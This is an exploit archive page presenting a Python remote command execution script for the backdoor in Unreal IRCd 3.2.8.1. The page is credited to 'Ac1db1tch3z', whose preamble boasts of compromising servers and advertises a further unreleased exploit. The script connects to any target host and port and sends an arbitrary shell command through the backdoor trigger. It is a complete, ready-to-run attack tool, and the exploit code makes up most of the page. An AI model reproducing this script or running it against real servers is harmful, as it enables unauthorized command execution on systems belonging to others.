exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Unreal IRCD 3.2.8.1 Remote Backdoor

Unreal IRCD 3.2.8.1 Remote Backdoor
Posted Jun 15, 2010
Authored by Ac1db1tch3z

Unreal IRCD version 3.2.8.1 remote command execution exploit.

tags | exploit, remote
SHA-256 | 13fb59763a9149cb8c2ac47622acf9b279de43db9e8ab6f6d1269434ff83f8af

Unreal IRCD 3.2.8.1 Remote Backdoor

Change Mirror Download

It seems as if our backdoor was found so we figured we cant sell this in the ac1db1tch3z
CANVAS pack (PhosphoricAc1d Exploit pack).

P.S. Since it took months and months for the community to find the system() exploit,
we still have a more complicated zerday unrealircd hack module. Please inquire
when our website is finished.

Brought to you by Ac1dB1tch3z: still using system() like it was 1992AD,
and still owning everyone with it. Thanks.
------------------------------------------------------------------------

$ stat ABunreal.py
File: `ABunreal.py'
Size: 830 Blocks: 8 IO Block: 4096 regular file
Device: fd02h/64770d Inode: 16891994 Links: 1
Access: (0777/-rwxrwxrwx) Uid: ( 1003/ ag) Gid: ( 1010/ ag)
Access: 2010-04-05 14:26:14.000000000 -0400
Modify: 2009-11-10 00:04:33.000000000 -0500
Change: 2010-04-05 14:26:59.000000000 -0400

------------------------------------------------------------------------

#!/usr/bin/env python
# Ac1db1tch3z 09

import sys
import socket
import struct

def injectcode(host, port, command):

host1 = host
port1 = int(port)
cmd = command

print "!#@#@! Ac1db1tch3z is just Unreal #@!#%%\n"
print "- Attacking %s on port %d"%(host1,port1)
print "- sending command: %s"%cmd

packet = "AB" +";"+ cmd + ";"+"\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((host1, port1))
except socket.error:
print "No connection..."
return 0
s.sendall(packet)
blah = s.recv(5000)
print blah
s.close()

if __name__ == "__main__":
if len(sys.argv) == 1:
print "Usage:", sys.argv[0], "<target host> <target port> <command>"
print
sys.exit(1)
else:
injectcode(sys.argv[1],sys.argv[2],sys.argv[3])

Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    34 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    19 Files
  • 23
    Jul 23rd
    17 Files
  • 24
    Jul 24th
    47 Files
  • 25
    Jul 25th
    31 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close